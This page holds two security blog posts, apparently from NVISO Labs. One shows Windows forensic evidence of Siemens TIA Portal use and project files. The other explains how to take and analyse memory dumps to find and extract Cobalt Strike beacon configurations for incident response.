For the scope of this series of blog posts we look at the Siemens TIA (Totally Integrated Automation) Portal as the software you can use to interact with, and program, PLCs. This is a simplified view, but it is sufficient to follow along with the blog posts. A PLC, or Programmable Logic Controller, can be viewed as a specially designed device to control industrial processes, like manufacturing, energy production and distribution, water supply and much more. The Siemens Simatic S7-1200, which we will mention later in this series, is just one example of the many representatives of this family.

If you approach your first engagement looking at a Windows system running the TIA Portal, you might have the same thought as I had: “Will some of the useful evidences, which I know and used in other Windows-based investigations, be there waiting to be unearthed?” Since it is always better to know such things before an actual incident takes place, we will cover some of the more standard evidences and how they behave with regard to the TIA Portal. Please note, we will not elaborate on the back and forth of every Windows-based evidence we mention, as this is not meant to be a blog post explaining standard evidence.

Evidence of Execution is available as you would expect. If you know what to look for, it perhaps helps in forming answers faster and more precisely.

The Prefetch artifact, if enabled on the system, would be written for “SIEMENS.AUTOMATION.PORTAL.EXE” and can be parsed like any other prefetch file. Additionally, the prefetch file for “SIEMENS.AUTOMATION.DIAGNOSTIC” also gets written or updated when the TIA Portal is started. If we have a look at the ShimCache (aka AppCompatCache), we can try to find the last time of execution by investigating the SYSTEM registry hive. On newer Windows systems, like our example Windows 10 system, you are out of luck with regard to the last time of execution: it is no longer recorded.

Investigating a Windows 10 system and having the System registry hive already open, the BAM key (ControlSet00x\Services\bam\State\UserSettings\$SID) will provide us with information on date and time for application execution. Knowing the executable name (“Siemens.Automation.Portal.exe”) and using it in a simple search quickly reveals the information we are looking for.
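As an aside, this lookup can also be scripted against an exported SYSTEM hive. The sketch below is a hypothetical example using the third-party python-registry library; it assumes ControlSet001 is the active control set (check the Select key in a real case) and that the first 8 bytes of each BAM value are a Windows FILETIME.

import struct
from datetime import datetime, timedelta

from Registry import Registry  # third-party package: python-registry


def filetime_to_utc(raw: bytes) -> datetime:
    """Convert a Windows FILETIME (100ns intervals since 1601-01-01) to a datetime."""
    filetime = struct.unpack("<Q", raw[:8])[0]
    return datetime(1601, 1, 1) + timedelta(microseconds=filetime / 10)


def list_bam_entries(system_hive_path: str, needle: str) -> None:
    reg = Registry.Registry(system_hive_path)
    key = reg.open("ControlSet001\\Services\\bam\\State\\UserSettings")
    for sid_key in key.subkeys():
        for value in sid_key.values():
            data = value.value()
            # Skip non-binary housekeeping values such as Version/SequenceNumber.
            if isinstance(data, bytes) and needle.lower() in value.name().lower():
                print(sid_key.name(), value.name(), filetime_to_utc(data))


list_bam_entries("SYSTEM", needle="portal")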

Reviewing more user related evidence, by analyzing the NTUser.dat for the user accounts in scope of the investigation, leads us to the UserAssist key. Reviewing the subkeys starting with: “CEBFF5CD…” and “F4E57C4B…” will give us the expected information, like run count, last executed time and so on. Just make sure you are looking into the correct values for each subkey. In the subkey starting with “F4E57C4B…” it is shortcuts we are looking into. In our installation the .lnk files are named “TIA Portal V15.1.lnk”, which is the default value, as it was not renamed by us.

Figure 1: TIA Portal related content in UserAssist Subkey “F4E57C4B…”

For the second subkey (“CEBFF5CD…”) we are looking at the executables, so the actual executable name is what we should search for.

Figure 2: TIA Portal related content in UserAssist Subkey “CEBFF5CD…”

But what about finding projects that have been present or opened on the machine you are investigating?

First of all we should have an idea of what a project looks like. Usually it is not a single file; instead, it is a structure of multiple folders and subfolders. Furthermore, it contains a file in the root directory of the project folder which you use to open the project in the TIA Portal. The file extension of these files changes with the version of the TIA Portal: “.apVERSION” is the current schema. This means a file created with the TIA Portal Version 15.1 will have “ap15_1” as file extension, while a file created with TIA Portal Version 13 will have “ap13” as file extension.

The following screenshot shows the file extensions which can be opened with the TIA Portal Version 15.1 and provides further examples of the naming schema.

Figure 3: TIA Portal Version 15.1 supported file extensions

Below you can see an overview of the files and the directory structure of a test project, in our case created with Version 15.1 of the TIA Portal:

Figure 4: Example listing of a test project created with TIA Portal V15.1

Equipped with this information we can check if and how the “.ap15_1” extension shows up in classic file use and knowledge artefacts.

Reviewing the recent files for a user, by investigating the RecentDocs key in the corresponding NTUSER.dat hive shows a subkey for the “.ap15_1” extension.

Figure 5: RecentDocs subkey for .ap15_1 file extension
Figure 6: Example content of RecentDocs subkey for .ap15_1 file extension

The second screenshot shows an excerpt of the “.ap15_1” key parsed by Registry Explorer. Please note, that if a project file is opened via the “Recently used” projects listing, shown on the starting view of the TIA Portal, the RecentDocs key is not updated.

Figure 7: TIA Portal view to open recently used projects

While we are dealing with user specific evidence, we can also check if Jump Lists are available as we would expect. We can use the tool JLECmd by Eric Zimmerman to parse all Jump Lists and review the results in Timeline Explorer. By applying a filter to only show files ending with “.ap” we get the overview shown below.
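As a hypothetical example of the invocation (flags may differ between JLECmd versions), parsing the AutomaticDestinations folder of our user to CSV files for Timeline Explorer could look like this; the output folder C:\temp\jumplists is arbitrary:

JLECmd.exe -d "C:\Users\nviso\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations" --csv C:\temp\jumplists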

Figure 8: Jump Lists entries showing .ap15_1 files

Here you can clearly see that we can parse out entries related to “.ap15_1” files for “Quick Access” and also for an App Id not known to JLECmd. This App Id is related to the TIA Portal and we can now also identify the automatic destinations file to open or parse the specific file if we want or need. It will be “4c28c7c161e44256.automaticDestinations-ms”, in our case stored under “C:\Users\nviso\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations”.  If a project is created and saved in the TIA Portal it will not show up in the Jump List. Further if you choose to open a project from the “Recently used” projects list, like described above, the Jump List of the TIA Portal will not be changed.

Figure 9: TIA Portal Recently used projects vs. Jump List

In figure 9 we demonstrated the potential differences between the Jump List (1.) and the “Recently used” projects in the TIA Portal (2.). Obviously the two most recent projects listed by the TIA Portal are missing in the Jump List. The “testproject12.ap15_1” file relates to an already existing project opened via the TIA Portal functionality and the “Pro_dev_C64_blast” project was created via the TIA Portal. The content of the Jump List is shown via the Windows Start menu in this example. Reviewing the Jump List with JLECmd validates these results.

The OpenSaveMRU, also user account specific evidence, is another place where we can look for the “.ap*” file extension and review activity. Opening the NTUSER.dat for the user account in focus and following the path down to the “OpenSavePidlMRU” key already shows the subkey for a file extension of interest. As always, you need to be aware of the evidence you are looking at: the OpenSaveMRU is maintained by the Windows shell dialog box, so projects will only show up here if they are opened or saved via the dialog box. Double-clicking a “.ap15_1” file will not make it show up here; luckily for us we have the Jump List and the “RecentDocs” key mentioned above. Also note that opening a project via the “Recently used” projects list of the TIA Portal, mentioned above in the section discussing “RecentDocs”, will not change the OpenSaveMRU.

Figure 10: OpenSaveMRU key containing subkeys for ap15_1 files

Needless to say that you can also search the $MFT for files with the extension of interest.

A few things need to be mentioned in regards of managing expectations:

  • The evidence produced by the Windows Operating System or the TIA Portal is not there for forensic or incident response investigations. It usually serves a different purpose than we are using it for. That being said, it should be understood that evidence might behave completely differently after software updates or in older/newer versions of the software.
  • Further it is not guaranteed that the software will produce the same evidence in any imaginable edge case.
  • The blog posts are based on our observations and testing results.

Conclusion & Outlook

The standard evidences on a Windows System can already bring some good insights into activities around the TIA Portal. However, we must be aware that the TIA Portal offers its own functions for opening and creating projects, which do not update the jump list, for example. For these cases we can review the “Settings.xml” file. We will focus on the “Settings.xml” file and information we can get out of raw project files in the upcoming blog posts.

About the Author

Olaf Schwarz is a Senior Incident Response Consultant at NVISO. You can find Olaf on Twitter and LinkedIn.

You can follow NVISO Labs on Twitter to stay up to date on all our future research and publications.

✇ NVISO Labs

Cobalt Strike: Memory Dumps – Part 6

By: didiernviso

This is an overview of different methods to create and analyze memory dumps of Cobalt Strike beacons.

This series of blog posts describes different methods to decrypt Cobalt Strike traffic. In part 1 of this series, we revealed private encryption keys found in rogue Cobalt Strike packages. In part 2, we decrypted Cobalt Strike traffic starting with a private RSA key. In part 3, we explained how to decrypt Cobalt Strike traffic if you don't know the private RSA key but do have a process memory dump. In part 4, we dealt with traffic obfuscated with malleable C2 data transforms. And in part 5, we dealt with Cobalt Strike DNS traffic.

For some of the Cobalt Strike analysis methods discussed in previous blog posts, it is useful to have a memory dump: either a memory dump of the system RAM, or a process memory dump of the process hosting the Cobalt Strike beacon.

We provide an overview of different methods to make and/or use memory dumps.

Full system memory dump

Several methods exist to obtain a full system memory dump of a Windows machine. As most of these methods involve commercial software, we will not go into the details of obtaining a full memory dump.

When you have an uncompressed full system memory dump, the first thing to check is the presence of a Cobalt Strike beacon in memory. This can be done with 1768.py, a tool to extract and analyze the configuration of Cobalt Strike beacons. Make sure to use a 64-bit version of Python, as uncompressed full memory dumps are huge.

Issue the following command:

1768.py -r memorydump

Example:

Figure 1: Using 1768.py on a full system memory dump

In this example, we are lucky: not only does 1768.py detect the presence of a beacon configuration, but that configuration is also contained in a single memory page, which is why we get the full configuration. Often, the configuration will span multiple memory pages, and then you get a partial result, sometimes even Python errors. But the most important piece of information we get from this command is that there is a beacon running on the system of which we took a full memory dump.

Let's assume that our command produced partial results. To obtain the full configuration, we then use Volatility to produce a process memory dump of the process(es) hosting the beacon. Since we don't know which process(es) host the beacon, we will create process memory dumps for all processes.

We do that with the following command:

vol.exe -f memorydump -o procdumps windows.memmap.Memmap --dump

Example:

Figure 2: using Volatility to extract process memory dumps – start of command
Figure 3: using Volatility to extract process memory dumps – end of command


procdumps is the folder where all process memory dumps will be written to.

This command takes some time to complete, depending on the size of the memory dump and the number of processes.

Once the command has completed, we use 1768.py again to analyze each process dump:

Figure 4: using 1768.py to analyze all extracted process memory dumps – start of command
Figure 5: using 1768.py to analyze all extracted process memory dumps – detection for process ID 2760
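One way to run 1768.py over every extracted dump from an interactive command prompt is sketched below (the pid.*.dmp naming matches the files produced by the Volatility command above):

for %f in (procdumps\pid.*.dmp) do 1768.py "%f"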

We see that file pid.2760.dmp contains a beacon configuration: this means that the process with process ID 2760 hosts a beacon. We can use this process memory dump if we need to extract more information, like encryption keys (see blog post 3 of this series).


Process memory dumps
Different methods exist to obtain process memory dumps on a Windows machine. We will explain several methods that do not require commercial software.

Task Manager
A full process memory dump can be made with Windows' built-in Task Manager.
Such a process memory dump contains all the process memory of the selected process.

To use this method, you have to know which process is hosting a beacon. Then select this process in Task Manager, right-click, and select “Create dump file”:

Figure 6: Task Manager: selecting the process hosting the beacon
Figure 7: creating a full process memory dump


The process memory dump will be written to a temporary folder:

Figure 8: Task Manager’s dialog after the completion of the process memory dump
Figure 9: the temporary folder containing the dump file (.DMP)

Sysinternals’ Process Explorer
Process Explorer can make process memory dumps, just like Task Manager. Select the process hosting the beacon, right-click and select “Create Dump / Create Full Dump“.

Figure 10: using Process Explorer to create a full process memory dump

Do not select "Create Minidump", as a process memory dump created with this option does not contain process memory.

With Process Explorer, you can select the location to save the dump:

Figure 11: with Process Explorer, you can choose the location to save the dump file

Sysinternals’ ProcDump
ProcDump is a tool to create process memory dumps from the command line. You provide it with a process name or process ID, and it creates a dump. Make sure to use option -ma to create a full process memory dump; otherwise the dump will not contain process memory.
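For example, a full dump of a process with ID 2760 could be created as follows (the PID and output file name are illustrative; add -accepteula on first use):

procdump.exe -ma 2760 beacon.dmp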

Figure 12: using procdump to create a full process memory dump


With ProcDump, the dump is written to the current directory.

Using process memory dumps
Just like with full system memory dumps, tool 1768.py can be used to analyze process memory dumps and to extract the beacon configuration.
As explained in part 3 of this series, tool cs-extract-key.py can be used to extract the secret keys from process memory dumps.
And if the secret keys are obfuscated, tool cs-analyze-processdump.py can be used to try to defeat the obfuscation, as explained in part 4 of this series.

Conclusion
Memory dumps can be used to detect and analyze beacons.
We developed tools to extract the beacon configuration and the secret keys from memory dumps.

About the authors

Didier Stevens is a malware expert working for NVISO. Didier is a SANS Internet Storm Center senior handler and Microsoft MVP, and has developed numerous popular tools to assist with malware analysis. You can find Didier on Twitter and LinkedIn.

You can follow NVISO Labs on Twitter to stay up to date on all our future research and publications.
